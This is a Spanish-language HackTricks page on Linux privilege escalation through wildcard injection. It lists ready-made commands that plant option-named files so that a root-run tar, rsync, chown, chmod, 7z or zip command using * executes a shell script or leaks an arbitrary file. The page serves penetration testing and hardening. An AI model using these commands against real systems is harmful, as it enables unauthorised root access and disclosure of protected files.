hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md

4.8 KiB

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

chown, chmod

Puedes indicar qué propietario de archivo y permisos deseas copiar para el resto de los archivos

touch "--reference=/my/own/path/filename"

Puedes explotar esto usando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (ataque combinado)
Más información en https://www.exploit-db.com/papers/33930

Tar

Ejecutar comandos arbitrarios:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Puedes explotar esto usando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (ataque tar)
Más información en https://www.exploit-db.com/papers/33930

Rsync

Ejecutar comandos arbitrarios:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Puedes explotar esto usando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (ataque rsync)
Más información en https://www.exploit-db.com/papers/33930

7z

En 7z incluso usando -- antes de * (nota que -- significa que la siguiente entrada no puede ser tratada como parámetros, solo como rutas de archivo en este caso) puedes causar un error arbitrario para leer un archivo, por lo que si un comando como el siguiente está siendo ejecutado por root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Y puedes crear archivos en la carpeta donde se está ejecutando esto, podrías crear el archivo @root.txt y el archivo root.txt siendo un enlace simbólico al archivo que deseas leer:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Entonces, cuando se ejecuta 7z, tratará root.txt como un archivo que contiene la lista de archivos que debe comprimir (eso es lo que indica la existencia de @root.txt) y cuando 7z lea root.txt, leerá /file/you/want/to/read y como el contenido de este archivo no es una lista de archivos, lanzará un error mostrando el contenido.

Más información en los Write-ups de la caja CTF de HackTheBox.

Zip

Ejecutar comandos arbitrarios:

zip name.zip files -T --unzip-command "sh -c whoami"
Aprende hacking en AWS de cero a héroe con htARTE (Experto en Red Team de AWS de HackTricks)!

Otras formas de apoyar a HackTricks: